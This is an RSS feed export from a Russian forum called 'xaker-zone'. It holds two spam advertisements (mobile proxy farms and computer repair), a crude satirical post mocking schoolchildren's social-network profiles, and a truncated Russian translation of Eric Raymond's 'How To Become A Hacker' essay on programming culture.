<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://xakerzone.bbeasy.ru/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>xaker-zone</title>
		<link>https://xakerzone.bbeasy.ru/</link>
		<description>xaker-zone</description>
		<language>ru-ru</language>
		<lastBuildDate>Fri, 30 Jun 2023 19:08:59 +0300</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>Топовые мобильные прокси фермы MobileProxy.ru</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=29#p29</link>
			<description>&lt;p&gt;&lt;a href=&quot;https://postimages.org/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://i.postimg.cc/Y2VrXMMs/topgoods.jpg&quot; alt=&quot;https://i.postimg.cc/Y2VrXMMs/topgoods.jpg&quot; /&gt;&lt;/a&gt; Внимание, владельцы бизнеса! Представляем вам уникальное решение для оптимизации вашего интернет-присутствия - топовые мобильные прокси фермы от Mobileproxy.ru! &amp;#9989; Наше оборудование это передовое устройство, которое позволяет вам выходить в интернет сразу с нескольких IP-адресов из одного места. &amp;#9989; Однако важно отметить, что наша техника не обеспечивает анонимность и она не предназначена для обхода блокировок, выход в сеть осуществляется с использованием купленных вами сим-карт. &amp;#9989; Теперь самое интересное! Приобретая оборудование от Mobileproxy.ru с использованием промокода s455, вы получаете невероятную скидку в размере 5000 рублей! Это отличная возможность сэкономить и воспользоваться передовыми технологиями для вашего бизнеса. &amp;#9989; Наши мобильные прокси фермы откроют перед вами широкие возможности. Вы сможете одновременно управлять несколькими аккаунтами, заниматься продвижением сайтов, сдавать прокси ферму в аренду, собирать данные с разных источников одновременно и многое другое где нужно одновременно несколько подключений к сети и периодическая смена ip адреса. С Mobileproxy.ru ваш бизнес будет оперативным, эффективным и успешным! &amp;#9989; Не упустите возможность улучшить свое интернет-присутствие и сэкономить деньги! Посетите наш веб-сайт &amp;lt;a href=&amp;quot;https://mobileproxy.ru/&amp;quot;&amp;gt;MobileProxy.ru&amp;lt;/a&amp;gt;, выберите подходящее оборудование, введите промокод s455 при оформлении заказа и получите скидку в размере 5000 рублей! &amp;#9989; Mobileproxy.ru - ваш надежный партнер для успешного интернет-бизнеса!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (cjijwckyfi)</author>
			<pubDate>Fri, 30 Jun 2023 19:08:59 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=29#p29</guid>
		</item>
		<item>
			<title>Ремонт компьютеров,ноутбуков по России</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=28#p28</link>
			<description>&lt;p&gt;Компьютеры, ноутбуки - техника современная и не застрахована от поломок. К такому типу техники нужен своевременный и комплексный подход, который могут обеспечить наши компетентные мастера. Самостоятельно починить компьютер сможет 5 человек из 100, а поломки происходят у каждого второго! Мы предоставляем услуги высокого качества по ремонту и исправлению проблем компьютерной техники более чем в 60 городах по РФ. Так же наши филиалы представлены в Республике Беларусь. Заявки обрабатываются нашими сотрудниками и не перепродаются в сторонние компании. Перейти:&amp;#160; &lt;a href=&quot;https://rempc-v-mo.ru/?t=33705&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://rempc-v-mo.ru/?t=33705&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (cjijwckyfi)</author>
			<pubDate>Fri, 17 Mar 2023 08:20:54 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=28#p28</guid>
		</item>
		<item>
			<title>обнаружение школоты</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=25#p25</link>
			<description>&lt;p&gt;Несмотря на то, что изначально разработчики представляли свой&lt;br /&gt;проект как социальную сеть для студентов, на сегодняшний день основную&lt;br /&gt;массу боевых хомячков ресурса составляет именно школота. Опытный&lt;br /&gt;анонимус легко определяет школьника по следующим признакам:&lt;br /&gt;- крутой московский вуз с невероятным 2020-9000 даже несмотря на то, что родным городом указана какая-нибудь Тверь или Полтава&lt;br /&gt;- алсо нереальная дата рождения (1111 января 9000 года)&lt;/p&gt;
						&lt;p&gt;- школота обожает ставить родным городом буржуйские Токио или Нью-Йорк,&lt;br /&gt;тогда как происходит из какой-нибудь Николаевки Калужской губернии&lt;br /&gt;- полное собрание Наруто в видеозаписях&lt;br /&gt;- нереальное количество картинок, нарисованных символами, в строке «Цитаты» и «О себе»&lt;/p&gt;
						&lt;p&gt;- рейтингодрочество, редко превышающее 101 пункт (при этом тратятся&lt;br /&gt;деньги на счету мобильника как своего, так и родительского, или же&lt;br /&gt;деньги скопленные со школьных завтраков);&lt;br /&gt;наличие в имени и нике нечитаемых символов, вроде «~O-KiD x3»&lt;/p&gt;
						&lt;p&gt;- плашка VIP на аватаре (если нет VIP, что редкость, то есть слово&lt;br /&gt;ANGEL или, на крайняк, хозяин фотографии изображен очень круто и&lt;br /&gt;мужественно (если мужского пола) или с оттопыренной грудью &amp;#8722;1-го&lt;br /&gt;размера (если бабского пола)&lt;br /&gt;- изменения статуса как минимум два&lt;br /&gt;раза в день. Школота очень любит, чтобы все знали, что школоте сейчас&lt;br /&gt;плохо/хорошо/не нравится, что выпал снег/осталось два дня до свидания,&lt;br /&gt;омг-омг-омг. Как вариант — трехчасовое задрачивание гугла в поисках&lt;br /&gt;какого-нибудь заумного афоризма или фразочки, которой школьник будет&lt;br /&gt;гордиться как будто сам придумал&lt;br /&gt;- огромное количество спама, писем счастья, вирусной рекламы на стене, ибо стирать жалко&lt;br /&gt;- огромные списки «любимых» музыкальных групп и фильмов в которые входят абсолютно всё что есть на компе&lt;/p&gt;
						&lt;p&gt;- лютый дроч на количество друзей. Добавляют в друзья всех подряд,&lt;br /&gt;начиная от людей, которые хоть как-то среагировали на их высер в&lt;br /&gt;различных обсуждениях, и заканчивая людьми, с которыми перекинулись&lt;br /&gt;хотя бы десятком слов ИРЛ. Так как большинство добавленных — такая же&lt;br /&gt;школота, добавление проходит успешно и с выгодой для обеих сторон&lt;/p&gt;
						&lt;p&gt;- у{censored}ская манера переписываться на стенах (стеноёбство).&lt;br /&gt;Дебильна всем — начиная от неудобства и необходимости сидеть и щелкать&lt;br /&gt;клавишу обновления, и заканчивая тем, что переписка временами бывает&lt;br /&gt;довольно личная, и выставлять напоказ свои посты невероятно глупо.&lt;br /&gt;Впрочем, на количество постов на стене школота тоже дрочит, поэтому все&lt;br /&gt;довольны&lt;br /&gt;- отмечание своих друзей на быдлокартинках, от&lt;br /&gt;«посмотрите какую картинку я нашел», до хомячковой хуиты вроде&lt;br /&gt;«Вконтакте могут закрыть! Разошли всем друзьям, чтобы они это не&lt;br /&gt;сделали!», «Нарисуйте что-нибудь на моей стене», «Кто я для вас» и тому&lt;br /&gt;подобного&lt;br /&gt;- Добаление на аватару картинок вроде «Убью за друзе», или «Гарячий мачо» с помощью быдло-сервисов вроде avatka.ru.&lt;br /&gt;Средняя анкета 1 сентебря...&lt;/p&gt;
						&lt;p&gt;Интересы: петь, танцевать, гулять, пребывать с друзьями. Реже спорт,&lt;br /&gt;машины et cetera. (Часто попадается что-то вроде «не люблю учица, я&lt;br /&gt;тупица») Среди старшеклассников мужского пола встречается «бухать,&lt;br /&gt;курить, заниматься сексом». Подобное времяпрепровождение считается у&lt;br /&gt;школоты атрибутом взрослости, и от подобных пунктов в анкете ЧСВ&lt;br /&gt;школьника резко поднимается, хотя из страха пропалиться он не делает&lt;br /&gt;ничего из вышеуказанного.&lt;br /&gt;Деятельность: учусь (как вариант «студент»)&lt;/p&gt;
						&lt;p&gt;Любимая музыка: Женский вариант — рок, попсняк, клубняк. Мужской — рок&lt;br /&gt;уровня КИШа, Арии и прочих групп, от которых приходит в экстаз любой&lt;br /&gt;говнарь, рэп ротации Муз-ТВ/МТВ (другого рэпа школие не знает и не&lt;br /&gt;признает), блатняк. (Часто выражается ненависть к определенному виду&lt;br /&gt;музыки. Как вариант «ненавижу Токио Хотел»/«Попсу»)&lt;br /&gt;Любимые&lt;br /&gt;телешоу: «Camedi Clab» (орфография сохранена) или Дом 2(как вариант&lt;br /&gt;«ненавижу Дом 2»), очень часто попадаются и прочие высеры канала ТНТ,&lt;br /&gt;например, «Счастливы вместе» или «Наша Rusiia» (Наша Rasha) (орфография&lt;br /&gt;сохранена). Школьники, желающие показать себя небыдлом, могут вписать&lt;br /&gt;передачи телеканала «Культура». У остальных к этому каналу либо&lt;br /&gt;нейтральное, либо отрицательное отношение.&lt;br /&gt;Книги: «не люблю&lt;br /&gt;читать» (абсолютная правда), но попадаются всякие алхимики и парфюмеры,&lt;br /&gt;the телки, коды да винчи и духлессы. В основном указываются книги,&lt;br /&gt;имеющие экранизацию («Мастер и Маргаритта» [орфография сохранена] и&lt;br /&gt;др.), а также «модный» (хоть и не прочитанный) Коэльо. Периодически&lt;br /&gt;вписываются произведения русских классиков, только что пройденных по&lt;br /&gt;школьной программе.&lt;br /&gt;Игры: Top 10 Игромании, Жызнь (без&lt;br /&gt;комментариев, нет имеется ввиду не эта жизнь), на нервах. Гламурное&lt;br /&gt;кисо пишет также The Sims или «симсики »&lt;br /&gt;Цитаты: «я зенсчина, а значит я октрисо» (так пишет в основном гламурненькое кисо) или «трудно быть скромным, если ты лучший».&lt;/p&gt;
						&lt;p&gt;О себе: я циничный/ая (= тупой/ая) эгоист/ка (= быдло) или стерва(=&lt;br /&gt;истеричка/шлюха). Диаметрально противоположное — «Красивая(= крокодил),&lt;br /&gt;добрая, красивая, умная, красивая, отзывчивая и, конечно же, красивая».&lt;br /&gt;Иногда в конце указывается «Люблю своего заю».&lt;br /&gt;Любимые фильмы:&lt;br /&gt;Много (фильм «Много» — самый популярный среди пол&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Mon, 07 Mar 2011 13:52:04 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=25#p25</guid>
		</item>
		<item>
			<title>пособие хакера</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=24#p24</link>
			<description>&lt;p&gt;Зачем нужен этот документ?&lt;/p&gt;
						&lt;p&gt;Как редактор &amp;quot;Жаргон-файла&amp;quot; (Jargon File), я часто получаю электронную почту от сетевых новичков-энтузиастов с вопросами, в конечном итоге сводящимися к одному: &amp;quot;Как же мне научиться, чтобы стать кудесником-хакером?&amp;quot;. Достаточно забавно, что, насколько можно видеть, нет никаких ЧаВО (FAQs) или Web-документов, содержащих ответ на этот жизненно-важный вопрос. Так что вот вам мой.&lt;/p&gt;
						&lt;p&gt;Если вы читаете копию этого документа в офф-лайне, то текущая версия оригинала (на английском языке) живет по адресу &lt;a href=&quot;http://www.catb.org/~esr/faqs/hacker-howto.html.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.catb.org/~esr/faqs/hacker-howto.html.&lt;/a&gt;&lt;br /&gt;Что такое хакер?&lt;/p&gt;
						&lt;p&gt;&amp;quot;Жаргон-файл&amp;quot; содержит кучу определений для термина &amp;quot;хакер&amp;quot;, большинство которых связано с технической компетентностью и удовольствием, получаемым от решения проблем и преодоления преград. Но если же вы хотите знать, как стать хакером, то действительно существенными являются два аспекта.&lt;/p&gt;
						&lt;p&gt;Имеется некоторое сообщество, некая общая культура, состоящая из опытных программистов и сетевых чародеев, которая ведет свою историю от многолетней давности первых миникомпьютеров с разделением времени и от самых ранних экспериментов с сетью ARPAnet. Члены этой культуры и дали рождение термину &amp;quot;хакер&amp;quot;. Хакеры построили Интернет. Хакеры сделали операционную систему Unix тем, чем она является сегодня. Хакеры ведут Usenet. Хакеры обеспечивают работу World Wide Web. Если вы являетесь частью этой культуры, если вы сделали в нее свой вклад, и другие члены этой культуры знают кто вы и называют вас хакером, то вы - хакер.&lt;/p&gt;
						&lt;p&gt;Хакерский взгляд на мир не ограничивается лишь культурой хакеров-программистов. Есть люди, применяющие хакерский подход и к другим вещам, вроде электроники или музыки. В действительности, вы можете встретиться с ним на высших уровнях любой науки или искусства. Софтверные хакеры признают таких близких по духу людей и тоже могут называть их &amp;quot;хакерами&amp;quot;, некоторые даже провозглашают, что хакерская природа на самом деле не зависит от среды, в которой работает хакер. Но в остальной части данного документа мы сосредоточимся на навыках и подходах софтверных хакеров, а также на традициях той общей культуры, что породила термин &amp;quot;хакер&amp;quot;.&lt;/p&gt;
						&lt;p&gt;Имеется и другая группа людей, громко именующих себя хакерами, но они ими не являются. Это те люди (главным образом, молодежь мужского пола), кого тягают за взлом компьютерных и телефонных систем. Настоящие хакеры называют таких людей &amp;quot;кракерами&amp;quot; и не желают иметь с ними ничего общего. Настоящие хакеры в большинстве своем считают кракеров ленивыми, безответственными и не особо умными. То, что человек способен взломать систему безопасности, не делает его хакером, точно так же как умение угонять тачки не делает вас автомобильным мастером. К несчастью, многие журналисты и писатели введены в заблуждение и используют слово &amp;quot;хакер&amp;quot; для описания кракеров, и это бесконечно раздражает настоящих хакеров.&lt;/p&gt;
						&lt;p&gt;Главное различие в следующем: хакеры строят вещи, а кракеры их ломают.&lt;/p&gt;
						&lt;p&gt;Если вы хотите стать хакером, то продолжайте чтение. Если же вы хотите стать кракером, то отправляйтесь читать ньюз-группу alt.2600 и приготовьтесь отсидеть от пяти до десяти лет в тюрьме, когда обнаружите, что не настолько ловки, насколько полагали. И это все, что я намерен сказать о кракерах.&lt;br /&gt;Хакерский подход&lt;/p&gt;
						&lt;p&gt;Хакеры решают проблемы и строят вещи, они верят в свободу и в добровольную взаимопомощь. Для того, чтобы вас воспринимали как хакера, вы должны вести себя так, как если бы это была ваша собственная позиция. А для того, чтобы вести себя так, будто это ваша позиция, вы должны действительно верить в эту позицию.&lt;/p&gt;
						&lt;p&gt;Но если вы рассчитываете культивировать хакерские подходы лишь для получения признания в культуре, то вы упустили суть. Стать таким человеком, кто верит в подобные вещи - это важно для вас, потому что это поможет вам научиться и поддержит стремление. Как и в любом творчестве, самый эффективный способ стать мастером - это подражать мировоззрению мастеров, не только интеллектуально, но также и эмоционально.&lt;/p&gt;
						&lt;p&gt;Так что если вы хотите стать хакером, то повторяйте следующие вещи, пока не поверите в них:&lt;br /&gt;1. Мир полон пленительных проблем, ждущих своего решения&lt;/p&gt;
						&lt;p&gt;Быть хакером - это огромное удовольствие, но это удовольствие такого рода, которое требует массы усилий. Для таких усилий нужна мотивация. Атлеты-чемпионы черпают мотивацию из своего рода физического удовольствия, получаемого от доведения собственного тела до совершенства, от преодоления собственных физических пределов. Подобно этому, чтобы быть хакером вы должны получать максимум удовольствия от решения проблем, от оттачивания своих навыков, от тренировки своего интеллекта.&lt;/p&gt;
						&lt;p&gt;Если же вы не из тех, кто ощущает подобные вещи естественным образом, то вам понадобится стать таким, чтобы сделаться хакером. В противном случае вы обнаружите, что вся ваша хакерская энергия исчерпана такими раздражителями, как секс, деньги и успех в обществе.&lt;/p&gt;
						&lt;p&gt;(Вы также должны развить что-то вроде веры в ваши собственные способности к обучению. Веры в то, что даже если вы возможно и не знаете всего, что необходимо для решения проблемы, но если вы освоили лишь кусочек и на этом научились, то уже знаете достаточно, чтобы решить и следующий кусок - и так далее, пока все не будет сделано.)&lt;br /&gt;2. Никто и никогда не должен решать проблему дважды&lt;/p&gt;
						&lt;p&gt;Творческие мозги - это ценный и ограниченный ресурс. Не следует растрачивать их на переизобретение колеса, когда вокруг ожидает так много чудеснейших новых проблем.&lt;/p&gt;
						&lt;p&gt;Чтобы вести себя как хакер, вы должны верить, что время размышлений других хакеров - драгоценно, причем настолько, что почти моральным долгом для вас является поделиться информацией. Решить проблемы, а затем просто раздать решения, чтобы другие хакеры могли решать новые проблемы вместо того, чтобы беспрестанно возвращаться к старым.&lt;/p&gt;
						&lt;p&gt;(От вас не требуется верить, что вы обязаны раздать все плоды своего творчества, хотя те хакеры, кто так делает, - наиболее уважаемы среди других хакеров. С ценностями хакеров вполне согласуется продажа плодов творчества, достаточная для обеспечения вас пищей, кровом и компьютерами. Согласуется это и с использованием ваших хакерских навыков для поддержания семьи и даже для того, чтобы разбогатеть, пока занимаясь этим вы не забываете, что являетесь хакером.)&lt;br /&gt;3. Скука и рутина - это зло&lt;/p&gt;
						&lt;p&gt;Хакеры (и вообще творческие люди) никогда не должны заниматься скучными вещами или погрязать в рутине монотонной работы, потому что когда это происходит, то это означает, что они не делают того, что могут делать лишь они - решать новые проблемы. Подобное расточительство вредит каждому. Поэтому скука и рутина - это не просто неприятные вещи, это зло.&lt;/p&gt;
						&lt;p&gt;Чтобы вести себя как хакер, вы должны верить в это так, чтобы желать автоматизации всех скучных мелочей настолько, насколько возможно, и не только для себя, но и для всех остальных (особенно, для других хакеров).&lt;/p&gt;
						&lt;p&gt;(Имеется одно явное исключение. Иногда хакеры занимаются вещами, которые могут показаться монотонными или скучными стороннему наблюдателю, в качестве упражнения для прочистки мозгов или же для выработки навыка. Либо же для приобретения особого рода опыта, который невозможно получить иным путем. Но все это делается по собственному выбору, никто из умеющих думать никогда не должен принуждаться к скучной работе.)&lt;br /&gt;4. Свобода - это благо&lt;/p&gt;
						&lt;p&gt;Хакеры по самой своей природе анти-авторитарны. Любой, кто может отдавать вам приказания, может остановить решение вами любой из проблем, вас очаровавших. И, учитывая образ мышления авторитарных мозгов, найдутся какие-нибудь потрясающе идиотские причины, чтобы это сделать. Так что с авторитарным подходом следует сражаться всюду, где вы его встретите, дабы он не душил вас и других хакеров.&lt;/p&gt;
						&lt;p&gt;(Это не то же самое, что сражаться со всеми властями. Детям нужно руководство, преступность необходимо сдерживать. Хакер может соглашаться на принятие какого-то рода руководства, когда есть возможность получить то, что нужно и не особо много времени тратится на выполнение приказов. Но это ограниченная разумная сделка, что-то вроде личной уступки.)&lt;/p&gt;
						&lt;p&gt;Авторитаризм процветает в условиях цензуры и секретности. Его адепты не верят в добровольное сотрудничество и в деление информацией, им нравится только такое &amp;quot;сотрудничество&amp;quot;, которым руководят они. Поэтому, чтобы вести себя как хакер, вы должны выработать в себе инстинктивное неприятие цензуры, секретности, а также применения силы или лжи для принуждения ответственных взрослых людей. И действовать необходимо исходя из такой веры.&lt;br /&gt;5. Позиция не заменит компетентность&lt;/p&gt;
						&lt;p&gt;Для того, чтобы быть хакером, вы должны развить в себе некоторые из перечисленных подходов. Но ухватив лишь подход вы сделаетесь хакером не в большей степени, чем спортсменом-рекордсменом или рок-звездой. Для того, чтобы стать хакером, требуются интеллект, практика, самоотверженность и тяжкий труд.&lt;/p&gt;
						&lt;p&gt;Поэтому вам придется научиться с недоверием относится к позиции, но с уважением к компетентности любого рода. Хакеры не позволят позерам транжирить их время, но они поклоняются компетентности, особенно - хакерской компетентности, но компетентность хороша в чем угодно. Особо ценится обладание такими необходимыми навыками, которые мало у кого есть. А самое лучшее - это компетентность в таких навыках, которые требуют проницательного ума, сноровки и концентрации.&lt;/p&gt;
						&lt;p&gt;Если вы боготворите компетентность, то вы получаете наслаждение, развивая ее в себе. Тяжкий труд и преданность делу станут для вас захватывающей игрой, а не рутиной. И это жизненно необходимо для того, чтобы стать хакером.&lt;br /&gt;Основные навыки хакера&lt;/p&gt;
						&lt;p&gt;Хакерский взгляд на жизнь - это важно, но мастерство - многократно важнее. Позиция не заменит компетентости, и существует определенный набор базовых навыков, которыми вам необходимо обладать, прежде чем любой из хакеров помыслит назвать хакером и вас.&lt;/p&gt;
						&lt;p&gt;Этот базовый набор со временем потихоньку изменяется по мере того, как технология порождает новые навыки и делает ненужными устаревшие. Например, обычно упоминалось программирование на машинном языке, но, вплоть до недавнего времени, в набор не включали язык HTML. Однако, в сегодняшний комплект вполне определенно входят следующие компоненты:&lt;br /&gt;1. Научитесь программировать&lt;/p&gt;
						&lt;p&gt;Это, конечно же, фундаментальный хакерский навык. Если вы не знаете ни одного компьютерного языка, я рекомендовал бы начать с языка Python. Он понятно разработан, хорошо документирован и относительно доброжелателен к новичкам. Несмотря на то, что он хорош для первого языка, это не просто игрушка. Это очень мощный и гибкий язык, хорошо подходящий для больших проектов.&lt;/p&gt;
						&lt;p&gt;Но знайте, что вы не достигнете хакерского уровня мастерства (или даже просто уровня хорошего программиста), если будете знать лишь один язык. Вам необходимо научиться мыслить о проблемах программирования вообще, независимо от любого конкретного языка. Чтобы быть настоящим хакером, вам надо достичь уровня, на котором вы сможете выучить новый язык за несколько дней, соотнося положения руководства с тем, что вам уже известно. Это означает, что вам следует выучить несколько очень разных языков.&lt;/p&gt;
						&lt;p&gt;Если вы занимаетесь серьезным программированием, то вам придется выучить Си, основной язык операционной системы Unix (хотя это и не тот язык, который следует пытаться выучить первым). Другие языки первостепенной важности для хакеров - это Perl и LISP. Язык Perl имеет смысл выучить из практических соображений: он очень широко используется для активных web-страниц и системного администрирования, так что даже если вам никогда не придется писать на Perl, вы должны научиться его читать. LISP стоит выучить ради тех глубоких просвещенных познаний, которые вы обретете, когда наконец его освоите. Эти познания сделают вас прекрасным программистом на всю оставшуюся жизнь, даже если вы никогда особо и не будете использовать сам LISP.&lt;/p&gt;
						&lt;p&gt;Лучше всего, на самом деле, выучить все четыре этих языка (Python, C, Perl, и LISP). Помимо того, что это самые важные хакерские языки, они демонстрируют очень разные подходы к программированию и каждый из них научит вас ценным вещам.&lt;/p&gt;
						&lt;p&gt;Я не могу дать здесь развернутые инструкции относительно того, как научиться программировать, - это сложное искусство. Но я могу сказать вам, что книги и курсы этому не научат (многие, возможно, большинство лучших хакеров - это самоучки). Что этому учит, так это (а) чтение кодов и (б) писание кодов.&lt;/p&gt;
						&lt;p&gt;Научиться программировать - это как научиться писать хорошим естественным языком. Самый лучший способ для этого - почитать что-то из написанного мастерами, затем написать немного самому; прочесть побольше, написать немного побольше; прочитать еще больше, написать еще побольше... И повторять этот процесс до тех пор, пока ваши программы не разовьются в нечто мощное и экономичное.&lt;/p&gt;
						&lt;p&gt;Отыскать хорошие коды для чтения раньше было сложно, потому что было очень мало больших программ, доступных в исходных кодах и пригодных для изучения и возни юных хакеров. Ныне ситуация кардинально изменилась: программы в исходных кодах, программистский инструментарий и операционные системы (все это создано хакерами) теперь широко доступны. Что подводит меня прямо к следующему разделу...&lt;br /&gt;2. Достаньте один из вариантов Unix в исходных кодах,&lt;br /&gt;научитесь его использовать и с ним работать&lt;/p&gt;
						&lt;p&gt;Я полагаю, что вы имеете персональный компьютер или можете получить к нему доступ (сегодня этим ребятам все достается так легко :-)). Единственный и самый важный шаг, который любой из новичков может предпринять для приобретения хакерских навыков, - это раздобыть копию Linux или одной из версий BSD-Unix, установить ее на персональной машине и запустить.&lt;/p&gt;
						&lt;p&gt;Да, в мире есть и другие операционные системы помимо Unix. Но их распространяют в двоичном виде - вы не сможете читать коды и не сможете их модифицировать. Учиться хакерству на машинах, работающих под DOS, Windows или MacOS - это все равно что учиться танцевать полностью загипсованным.&lt;/p&gt;
						&lt;p&gt;Кроме того, Unix - это операционная система Интернета. Хотя вы можете научиться использовать Интернет и не зная Unix, но вы не можете быть Интернет-хакером, не понимая Unix. По этой самой причине сегодняшняя хакерская культура является весьма сильно Unix-сконцентрированной. (Это не всегда было так, и некоторым из прежних хакеров такое положение дел не очень по нраву, но симбиоз между Unix и Интернетом стал настолько прочен, что даже сил Microsoft не хватает, чтобы серьезно на это влиять.)&lt;/p&gt;
						&lt;p&gt;Так что заводите себе Unix, мне самому нравится Linux, но есть и другие варианты (и да-да, вы можете работать как под Linux, так и под DOS/Windows на одной и той же машине). Выучите эту ОС. Работайте с ней. Возитесь с ней. Общайтесь через нее с Интернетом. Читайте коды. Модифицируйте их. Вы получите такой программистский инструментарий (включая C, Lisp и Perl), о котором любая из ОС Microsoft и не мечтала. Вы получите удовольствие, и вы усвоите больше знаний, чем предполагали в процессе обучения, когда оглянетесь на этот процесс уже будучи мастером-хакером.&lt;/p&gt;
						&lt;p&gt;Для дополнительной информации об изучении Unix см. The Loginataka.&lt;/p&gt;
						&lt;p&gt;Чтобы заполучить в свои руки Linux, см. Where can I get Linux (&amp;quot;Где мне взять Linux&amp;quot;).&lt;br /&gt;3. Научитесь использовать World Wide Web и писать на HTML&lt;/p&gt;
						&lt;p&gt;Большинство из тех вещей, что созданы хакерской культурой, делают свое дело невидимо, помогая работать фабрикам, учреждениям и университетам без сколь-нибудь заметного влияния на жизнь не-хакеров. WWW - это одно большое исключение, гигантская блестящая хакерская игрушка, которая даже по признанию политиков изменяет мир. Лишь по одной этой причине (а также и множеству других приятных причин) вам следует научиться работать с Web.&lt;/p&gt;
						&lt;p&gt;Это не означает, что нужно просто научиться управляться с браузером (это любой умеет), но научиться писать на HTML, языке разметки документов Web. Если вы еще не умеете программировать, то писание на HTML обучит ваше мышление некоторым полезным привычкам, которые пригодятся при освоении языков программирования. Так что делайте домашнюю страничку.&lt;/p&gt;
						&lt;p&gt;Но простое обладание домашней страничкой даже и близко не подведет вас к тому, чтобы стать хакером. В Web полным-полно домашних страничек. Большинство из них - это бессмысленный, бесполезный хлам. Крайне броско и привлекательно оформленный хлам, не спорю, но все равно хлам (подробнее об этом см. страничку &amp;quot;Ад HTML&amp;quot; -The HTML Hell Page).&lt;/p&gt;
						&lt;p&gt;Чтобы быть стоящей, ваша страничка должна иметь &amp;quot;контент&amp;quot; - содержание. Она должна быть интересной и / или полезной для других хакеров. А это подводит нас к следующему разделу...&lt;br /&gt;Статус в хакерской культуре&lt;/p&gt;
						&lt;p&gt;Как и большинство культур без денежной экономики, Хакерландия строится на репутации. Вы пытаетесь решить интересные проблемы, но вот насколько они интересны, и насколько в действительности хороши ваши решения, - это нечто такое, о чем обычно могут судить только (в техническом смысле) равные вам или превосходящие вас.&lt;/p&gt;
						&lt;p&gt;Таким образом, когда вы играете в хакерские игры, вы учитесь вести счет главным образом по тому, что думают о вашем мастерстве другие (именно поэтому вы не будете хакером до тех пор, пока вас не станут так называть другие хакеры). Данный факт затеняют как образ хакера-одиночки, так и определенные табу хакерской культуры (ныне существенно ослабевшие, но все еще мощные), не допускающие, чтобы чье-то эго или внешнее признание вообще могли бы быть мотивацией для хакера.&lt;/p&gt;
						&lt;p&gt;В частности, Хакерландия - это то, что антропологи именуют &amp;quot;культурой даров&amp;quot;. Вы зарабатываете статус и репутацию не тем, что руководите другими людьми, и не тем что прекрасны, и не тем что имеете вещи, которые являются предметом вожделения других. Но скорее тем, что раздаете вещи. В частности, одаривая своим временем, своим мастерством и результатами своего творчества.&lt;/p&gt;
						&lt;p&gt;Есть пять основных типов вещей, которые вы можете делать, чтобы вас уважали хакеры:&lt;br /&gt;1. Пишите программы с открытым исходным кодом&lt;/p&gt;
						&lt;p&gt;Первое (самое главное и самое традиционное) - это писать программы, которые другие хакеры считают забавными или полезными, и раздавать исходные коды программ для использования всей хакерской культурой.&lt;/p&gt;
						&lt;p&gt;Мы привыкли называть такую работу &amp;quot;свободно-доступным программным обеспечением&amp;quot; (free software), но это привело в замешательство очень многих людей, точно не понимавших, что подразумевалось под словом &amp;quot;свободно-доступное&amp;quot;. Теперь для такого программного обеспечения многие из нас предпочитают использовать термин &amp;quot;с открытым исходным кодом&amp;quot; или &amp;quot;open-source software&amp;quot;.&lt;/p&gt;
						&lt;p&gt;Наиболее почитаемые полубоги Хакерландии - это люди, которые написали большие и талантливые программы, отвечающие самым широким потребностям, и которые раздали их всем, так что каждый теперь их использует.&lt;/p&gt;
						&lt;p&gt;2. Помогайте тестировать и отлаживать программы&lt;br /&gt;с открытым исходным кодом&lt;/p&gt;
						&lt;p&gt;Почитаемы также те, кто тестирует и отлаживает программы с открытым кодом. В этом несовершенном мире мы неизбежно затрачиваем самую большую часть времени разработки программы на фазу отладки. Именно поэтому любой думающий автор программ с открытым кодом скажет вам, что хорошие бета-тестеры (знающие, как внятно описать симптомы, хорошо локализующие проблемы, способные исправлять опечатки и применяющие несколько простых диагностических подпрограмм) ценятся на вес золота. Всего один такой человек может превратить фазу отладки из затянутого изнуряющего кошмара в просто полезную задержку.&lt;/p&gt;
						&lt;p&gt;Если вы новичок, то попытайтесь найти разрабатываемую программу, которая вам интересна, и станьте хорошим бета-тестером. Существует вполне естественный путь продвижения от помощи в тестировании программ к помощи в их отладке и далее, к помощи в их модификации. Вы многому научитесь таким способом и породите добрую карму в отношениях с людьми, которые помогут вам впоследствии.&lt;/p&gt;
						&lt;p&gt;3. Публикуйте полезную информацию&lt;/p&gt;
						&lt;p&gt;Еще одна хорошая вещь - отбирать и накапливать полезную и интересную информацию на Web-страницах или документах типа ЧаВО (FAQ или &amp;quot;часто задаваемые вопросы и ответы&amp;quot;), и делать их общедоступными.&lt;/p&gt;
						&lt;p&gt;Ведущие основных технических ЧаВО почти столь же уважаемы, как и авторы программ с открытым исходным кодом.&lt;/p&gt;
						&lt;p&gt;4. Помогайте поддерживать работу инфраструктуры&lt;/p&gt;
						&lt;p&gt;Хакерская культура (и инженерная разработка Интернет, к слову сказать) основана на добровольцах. Имеется масса необходимой, но не особо эффектной работы, которую нужно делать, чтобы поддерживать процесс: администрирование рассылочных листов, модерирование новостных групп, управление большими архивами программного обеспечения, разработка RFC и других технических стандартов.&lt;/p&gt;
						&lt;p&gt;Люди, хорошо делающие такого рода вещи, глубоко уважаемы, поскольку каждый знает, что подобная работа требует кучу времени и не так забавна как игры с кодами. Эта работа свидетельствует о самоотверженности.&lt;/p&gt;
						&lt;p&gt;5. Служите самой хакерской культуре&lt;/p&gt;
